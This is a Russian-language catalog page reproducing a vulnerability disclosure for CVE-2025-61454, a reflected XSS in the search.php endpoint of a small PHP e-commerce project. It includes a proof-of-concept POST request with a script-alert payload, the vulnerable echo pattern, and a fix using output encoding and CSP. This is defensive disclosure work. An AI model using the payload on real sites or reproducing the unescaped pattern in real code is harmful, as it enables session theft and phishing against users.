Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-61454 — Публичное раскрытие и proof-of-concept для CVE-2025-61454, отражённой XSS-уязвимости в search.php проекта E-commerce Project v1.0, включая шаги эксплуатации и рекомендации по устранению. | Kitploit
Инструменты/GitHubGitHub/tansique-17/cve-2025-61454
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьСтатьи и ИсследованияОбучение и Образование
GitHubtansique-17/cve-2025-61454

CVE-2025-61454

Публичное раскрытие и proof-of-concept для CVE-2025-61454, отражённой XSS-уязвимости в search.php проекта E-commerce Project v1.0, включая шаги эксплуатации и рекомендации по устранению.

Репозиторий
1011 месяцев назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ Раскрытие CVE: CVE-2025-61454 — Отражённый XSS в E-commerce Project

Дата раскрытия: 14 октября 2025 г.
Идентификатор CVE: CVE-2025-61454
Серьёзность: СРЕДНЯЯ (CVSS 6.1)


🧩 Краткое описание

Уязвимость отражённого межсайтового скриптинга (XSS) существует в E-commerce Project v1.0, а именно в конечной точке search.php. Несанитизированный ввод в параметре search напрямую отражается обратно в HTML-ответ, что позволяет злоумышленникам выполнять произвольный JavaScript в браузере пользователя, который переходит по вредоносной ссылке или отправляет специально созданный запрос.

Этой проблеме присвоен идентификатор CVE-2025-61454. На момент раскрытия патч от поставщика не выпущен.


📦 Затронутый продукт

  • Поставщик: Независимый (Bhabishya-123)
  • Проект: E-commerce
  • Версия: v1.0
  • Файл: search.php
  • Уязвимая конечная точка:
    http://localhost/e-commerce-main/search.php

🔬 Детали уязвимости

Сервер не выполняет надлежащую санитизацию параметра search из данных POST перед его отражением в HTML-ответе. Это позволяет злоумышленникам внедрять JavaScript-пейлоады, что приводит к выполнению кода на стороне клиента.

Злоумышленник формирует ввод, содержащий встроенное скриптоподобное содержимое, и отправляет его на уязвимую POST-конечную точку. Поскольку сервер отражает ввод в HTML-ответ без применения надлежащего HTML/атрибутного/JS-кодирования, браузер обрабатывает отражённое содержимое как исполняемую разметку и выполняет её. Это сценарий отражённого (непостоянного) XSS; злоумышленник должен убедить жертву выполнить запрос или перейти по специально созданной ссылке/форме.

Уязвимый паттерн кода (гипотетический):

$search = $_POST['search'];
echo "<div>Search results for: $search</div>";

📌 Классификация CWE

Идентификатор CWEНазвание
CWE-79Некорректная нейтрализация ввода при генерации веб-страницы ('Межсайтовый скриптинг')

📊 Оценка CVSS v3.1

ОценкаСерьёзностьВекторная строка
6.1СРЕДНЯЯCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

💥 Воздействие

Успешная эксплуатация может привести к:

  • 🧠 Выполнению произвольного JavaScript
  • 🎭 Фишингу или имитации через HTML-инъекцию
  • 🍪 Перехвату сессии или краже токенов
  • 🚨 Принудительному перенаправлению или доставке вредоносного ПО
  • 🎣 Сбору учётных данных через поддельные формы входа
  • 📊 Дефейсу страницы результатов поиска

🧪 Доказательство концепции (PoC)

1. Клонирование репозитория

git clone https://github.com/Bhabishya-123/E-commerce.git

2. Локальный хостинг

Используйте XAMPP/LAMP для развёртывания проекта и доступа к приложению.

3. Эксплуатация уязвимости

📥 Пример запроса

POST /e-commerce-main/search.php HTTP/1.1
Host: localhost
Referer: https://localhost/e-commerce-main/
Content-Type: application/x-www-form-urlencoded

search=yxo9p%3cscript%3ealert(1)%3c%2fscript%3exnzmd&submit=

📋 Декодированный пейлоад

search=yxo9p<script>alert(1)</script>xnzmd&submit=

📋 Внедрённый пейлоад

yxo9p<script>alert(1)</script>xnzmd

Пояснение:
Пейлоад <script>alert(1)</script> встроен в параметр search. Когда жертва отправляет форму поиска с этим вредоносным пейлоадом (или её обманом заставляют это сделать с помощью социальной инженерии), JavaScript выполняется в контексте её браузера.

4. Ожидаемый результат

Если уязвимость присутствует, браузер выполнит JavaScript-код, отобразив окно предупреждения со значением 1. Это подтверждает успешную эксплуатацию XSS.


🔐 Рекомендации

  • ✅ Используйте htmlspecialchars() или аналогичные функции для кодирования всех недоверенных выходных данных перед выводом в HTML.
  • 🧰 Внедрите серверную валидацию ввода для всех полей форм, особенно для параметра поиска.
  • 🧱 Установите строгие заголовки Content Security Policy (CSP) для предотвращения выполнения встроенных скриптов.
  • 🚫 Избегайте прямого встраивания несанитизированных пользовательских вводов в HTML-ответы.
  • 🔒 Внедрите надлежащее кодирование выходных данных в зависимости от контекста (HTML, JavaScript, URL, CSS).
  • 🛡️ Используйте современные фреймворки, обеспечивающие автоматическую защиту от XSS.

✅ Пример исправления

$search = htmlspecialchars($_POST['search'], ENT_QUOTES, 'UTF-8');
echo "<div>Search results for: $search</div>";

🛡️ Пример Content Security Policy

Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'

📆 Хронология

СобытиеДата
Уязвимость обнаружена16 сентября 2025 г.
Публичное раскрытие13 октября 2025 г.
Патч доступен❌ Недоступен на момент раскрытия

🙋‍♂️ Авторство

Эта уязвимость была обнаружена и раскрыта:

Tansique Dasari
🔗 GitHub
✉️ [email protected]


🔗 Ссылки

  • OWASP - XSS
  • CWE-79 - Классификация XSS
  • PortSwigger - Межсайтовый скриптинг
  • CVE-2025-61454 на CVE.org

💬 Данный бюллетень опубликован независимо в связи с отсутствием официального патча от поставщика.

Скачать инструмент